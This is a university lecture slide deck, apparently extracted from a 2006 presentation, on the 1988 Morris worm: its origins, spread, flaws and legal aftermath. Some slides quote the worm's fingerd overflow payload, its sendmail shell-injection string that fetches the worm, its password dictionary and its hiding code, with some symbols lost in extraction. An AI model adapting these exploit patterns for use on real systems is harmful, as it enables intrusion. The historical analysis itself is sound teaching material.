The Internet Worm of 1988

1
The Internet Worm of 1988 Svetlana V.
Drachova-Strang Clemson University CPSC
681 April 25, 2006
There may be a virus loose on the internet
Andy Sudduth of Harvard, 34 minutes after
midnight, Nov. 3, 1988
2
Creator and His Creation

• November 2nd, 1988
• Robert Tappan Morris, 23-year old cs student
  from Cornell
• released a worm from MIT.
• Aside son of Robert Morris, Sr. Chief
  Scientist at the National
• Computer Security Center, subdivision of
  NSA
• The Morris worm
• Consisted of several files of
  cleverly-written C code
• Intentions
• Probe the size of Internet with a
  self-replicating program ?
• Effects
• -- Internet down
• -- Thousands of machines disconnected from
  Internet
• -- Worm on the loose

3
What the worm DID NOT do

• Did not cause physical damage to computer
  systems.
• Did not alter or destroy system or user files
• Did not affect machines running OSs other than
  VAX or BSD Unix
• Did not save or transmit the cracked passwords
• Did not attempt to gain superuser access
• Did not plant any trojans or timebombs
• Did not attack machines that were not attached
  to the internet

4
What the worm DID

• Self-propagated through Internet infecting
  and reinfecting machines
• Self-replicated unstoppably
• Explored several vulnerabilities fingerd,
  sendmail, passwords
• Had flaws that made it especially destructive,
  and/or impaired the
• intended functionality
• Cracked user passwords
• Disguised itself by several clever means

5
History and Origins

• Worms were good at first
• Noble usage
• 1975 tapeworm John Brunners The Shockwave
  Rider
• early 1980s John Shoch, Jon Hupp created five
  worms
• for executing helpful tasks on the internet
  billboard worm, vampire
• worm, etc. a useful way to run
  distributed diagnostics
• Mishap and the first lesson learned
• Conclusions
• We have the tools at hand to experiment with
  distributed computations in their
• fullest form dynamically allocating resources
  and moving from machine
• to machine. Furthermore, local networks
  supporting relatively large numbers
• of hosts now provide a rich environment for this
  kind of experimentation.
• The basic worm programs described here
  demonstrate the ease with which
• these mechanisms can be explored (J. Shoch, J.
  Hupp)

6
The Horrible Night
600 PM The Worm is launched 849 PM The
Worm infects a VAX-8600 at the University of
Utah 909 PM The Worm initiates the first
attack to infect others 921 PM Load average
on the system reaches 5 (sh be 1) 941 PM
Load average reaches 7 1001 PM Load average
reaches 16 1006 PM No new processes can be
started. System unusable 1020 PM System
administrator kills off the worms 1041 PM
System is reinfected, load average reaches 27
1049 PM System administrator shuts down and
restarts the system 1121 PM Reinfestation
causes load average to reach 37.
7
fingerd Vulnerability Exploited

• fingerd has a 512 char buffer
• worm calls write() with 536 char newline
  argument
• 6 words overwrite system stack including
  return PC, that makes a system
• call version of execve(/bin/sh) that
  installs the worm on the target system.
• char buf536 "\335\217/sh\0\335\217/bin\320Z\
  335\0\335\0\335Z\335\003
• \320\\\274\344\371\344\342\241\256\343\
  350\357\256\362\351"
• / Rewrite part of the stack frame /
• l556 0x7fffe9fc l560 0x7fffe8a8 l564
  0x7fffe8bc
• l568 0x28000000 l552 0x0001c020
• ifdef sun / Reverse the word order for
  the Sun machines/
• l556 byte_swap(l556) l560 byte_swap(l560) l5
  64 byte_swap(l564)
• l568 byte_swap(l568) l552 byte_swap(l552)
• endif sun
• write(s, buf, sizeof(buf)) / sizeof 536 /
  

8
sendmail Vulnerability Exploited

• TCP flaw - DEBUG flag allows to send mail to
  a process instead of user.
• Worm sends message with DEBUG flad to a
  cleverly built recepient,
• String sets up command deleting header, passes
  body to command interpreter.
• It will compile code that opens a connection
  and gets a copy of the worm
• define MAIL_FROM "mail fromlt/dev/nullgt\n"
• define MAIL_RCPT "rcpt tolt\" sed \'1,//d\'
  /bin/sh exit 0\"gt\n"
• send_text(s, XS(MAIL_FROM))
• sprintf(l548, XS(MAIL_RCPT), i, i)
• send_text(s, l548)
• send_text(s, XS("data\n"))
• compile_slave(host, s, saddr)
• send_text(s, XS("\n.\n"))
• send_text(s, XS("quit\n"))

9
Password Cracking

• Exploited 2 vulnerabilities
• System /etc/passwd file
• User weak passwords
• Attack has 4 stages
• 0 seek other machines to infect from
  /etc/hosts.equiv and /.rhosts
• 1 obvious password guesses (35 success)
• 2 worms internal dictionary
• 3 systems online dictionary in
  /usr/dict/words

10
Worms dictionary
char wds / 0x21a74 / "academia",
"aerobics", "airplane", "albany", "albatross",
"albert", "alex", "alexander", "algebra",
"aliases", "alphabet", "amorphous", "analog",
"anchor", "andromache", "animals", "answer",
"anthropogenic", "anvils", "anything", "aria",
"ariadne", "arrow", "arthur", "athena",
"atmosphere", "aztecs", "azure", "bacchus",
"bailey", "banana", "bananas", "bandit",
"banks", "barber", "baritone", "bass", "bassoon",
"batman", "beater", "beauty", "beethoven",
"beloved", "benz", "beowulf", "berkeley",
"berliner", "beryl", "beverly", "bicameral",
"brenda", "brian", "bridget", "broadway",
"bumbling", "burgess", "campanile", "cantor",
"cardinal", . . . "tarragon", "taylor",
"telephone", "temptation", "thailand", "tiger",
"toggle", "tomato", "topography", "tortoise",
"toyota", "trails", "trivial", "trombone",
"tubas", "tuttle", "umesh", "unhappy", "unicorn",
"unknown", "urchin", "utility", "vasant",
"vertigo", "vicky", "village", "virginia",
"warren", "water", "weenie", "whatnot",
"whiting", "whitney", "will", "william",
"williamsburg", "willie", "winston", "wisconsin",
"wizard", "wombat", "woodwind", "wormwood",
"yacov", "yang", "yellowstone", "yosemite",
"zimmerman", 0 / contained 421 words/
11
Concealing Itself

• Rename itself to sh, which is also the name of
  the Bourne shell
• strcpy(argv0, XS("sh"))
• Set core dump size to zero
• rl.rlim_cur 0
• rl.rlim_max 0
• if (setrlimit(RLIMIT_CORE, rl))
• Deleting parent process and manipulating
  process id
• Used encryption

12
Oops, The Worm Had Flaws

• Major flaws in the program code
• only 14 chance that the worm will check if
  the target system
• has already been infected
• 1 in 7 chance (instead of 1 in 10,000) that
  listening worm will not
• listen for a pleasequit() signal
• Used TCP socket command sendto instead of the
  UDP send to send
• 1B of data from each machine to the
  originating Berkely machine
• 128.32.137.13 port 11357
• There were other flaws as well

13
Worm Map
from http//snowplow.org/tom/worm/history.html
14
Complex Logic of the Worm
15
Lessons Learned

• The Morris Worm was the first worm to bring
  Internet down
• Worm is a powerful tool capable of inflicting a
  lot of damage
• Computer crime is punishable under the Computer
  Fraud and Abuse Act of 1986.
• Later Mr. Morris himself stated that the
  incident
• has raised the public awareness to a
  considerable degree.
• R H Morris,
  quoted in the New York Times 11/5/88.